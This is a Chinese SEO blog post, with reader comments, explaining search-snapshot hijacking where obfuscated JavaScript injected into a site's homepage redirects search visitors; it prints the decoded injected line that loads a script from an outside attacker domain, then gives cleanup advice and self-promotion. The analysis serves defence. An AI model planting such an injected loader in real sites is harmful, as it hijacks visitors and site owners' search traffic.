站長們經(jīng)常遇到j(luò)s快照劫持的問題,對網(wǎng)站的優(yōu)化帶來及大的影響。對于大多數(shù)新手站長來說js快照劫持,束手無策。今天無憂老師為大家進(jìn)行一輪深度的解析。
一,js快照劫持示例
js快照劫持演示圖,記錄了是網(wǎng)站跳轉(zhuǎn)的。
一個(gè)是百度搜索快照劫持演示。另一個(gè)是搜狐搜索快照劫持演示。


二,分析js快照劫持代碼
經(jīng)分析,網(wǎng)站首頁被植入了惡意了代碼,而且是多次加密JS代碼。
此段代碼就是添加在網(wǎng)站首頁的JS,而且屬于了加密了的代碼,一般看不出什么貓膩。
三,加密JS層層分析
接下來進(jìn)行JS反向解析分析。可以使用站長工具在線分析:http://tool.chinaz.com/js.aspx

解析后,可以看到真面目,這段代碼。
< script type = “text/javascript” >
document.writeln(“<script src=http://www.5121188.com/main2.js></script>”); < /script>
打開這個(gè)main2.js可以看到一段落代碼。

攻擊者真的多有精力,層層加密啊。怪不得一般站長根本無法發(fā)現(xiàn)。
然后再進(jìn)行解密。

這下大家應(yīng)該清楚了,攻擊者對代碼進(jìn)行了3次的加密再調(diào)用,來實(shí)現(xiàn)百度快照的JS劫持跳轉(zhuǎn)。
四,網(wǎng)站安全建議
網(wǎng)站安全一直是一個(gè)讓站長運(yùn)營者頭痛的問題,沒有百分百安全的網(wǎng)站,只有一斷的進(jìn)行維護(hù)和優(yōu)化,做到定期備份,定期檢查,最大程度的杜絕網(wǎng)站被黑被劫持的風(fēng)險(xiǎn)。希望各位站長清楚并且牢記在心。
如果想要?我把整個(gè)JS快照劫持代碼分析給大家,關(guān)注微信wuyouseo獲取。
最后,在我的課程中也經(jīng)常會分享一些網(wǎng)站安全小知識,請大家一定關(guān)注我的SEO博客m.fpfocvy.com.cn和微信公眾號wuyousem,不斷的分析干貨教程和文章。
文章由SEO技術(shù)博客 無憂老師分享,轉(zhuǎn)載請注明出處。http://m.fpfocvy.com.cn/ 感謝你的閱讀。
免責(zé)聲明:網(wǎng)所有文字、圖片、視頻、音頻等資料均來自互聯(lián)網(wǎng),不代表本站贊同其觀點(diǎn),內(nèi)容僅提供用戶參考,若因此產(chǎn)生任何糾紛,本站概不負(fù)責(zé),如有侵權(quán)聯(lián)系本站刪除!郵箱:207985384@qq.com http://m.fpfocvy.com.cn/jishu/2270.html


快照劫持就是你在百度搜索關(guān)鍵詞出現(xiàn)的結(jié)果排名的快照內(nèi)容不是你網(wǎng)站的內(nèi)容,而是一些不良信息,關(guān)于bocai類等的,那么就是你的網(wǎng)站中招了。那么他們是怎么做到的呢?這個(gè)肯定就是你網(wǎng)站程序有漏洞,讓黑客技術(shù)人員找到后門進(jìn)入你的網(wǎng)站進(jìn)行篡改的,他們篡改的時(shí)間一般是晚上凌晨以后,這樣在百度搜索引擎蜘蛛抓取你的快照的時(shí)候就是他們篡改的內(nèi)容被抓取到了,然后又神不知鬼不覺的又把你原來的TDK換回來了。這樣你就會發(fā)現(xiàn)你的網(wǎng)站什么都沒有變化,但是你的快照內(nèi)容發(fā)生了更改,這個(gè)時(shí)候你就是丈二的和尚了。
打開首頁文件,找到文件頂部title標(biāo)簽的部分看看有無被加密的代碼,然后清除掉,然后重新上傳(如果全站被黑,那就只有徹底清除了),如果清理代碼過后沒過多久還是被反復(fù)篡改的話,應(yīng)該對網(wǎng)站的源碼以及文件進(jìn)行檢查,清除掉惡意鏈接。如果技術(shù)不夠,無法準(zhǔn)確判斷的話,可以直接找專業(yè)的網(wǎng)站安全公司來處理解決,國內(nèi)SINE安全、綠盟、啟明星辰都是比較有名的安全公司
@阿里云:是的,理解的非常到位,不虧是大神留言。
網(wǎng)站快照被劫持跳轉(zhuǎn) 首先看首頁代碼有無被篡改 ,看你的圖片情況 應(yīng)該是存在隱藏性質(zhì)的腳本木馬,建議聯(lián)系專業(yè)做安全的公司來深入進(jìn)行全面的代碼審計(jì)以及漏洞檢測和修補(bǔ),國內(nèi)推薦找Sinesafe以及綠盟和啟蒙星辰。
網(wǎng)站快照被劫持跳轉(zhuǎn) 首先看首頁代碼有無被篡改 ,看你的圖片情況 應(yīng)該是存在隱藏性質(zhì)的腳本木馬,建議聯(lián)系專業(yè)做安全的公司來深入進(jìn)行全面的代碼審計(jì)以及漏洞檢測和修補(bǔ),國內(nèi)推薦找Sinesafe以及綠盟和啟蒙星辰。
需要三次解密嗎
以前遇到過這種情況,真的好惡心。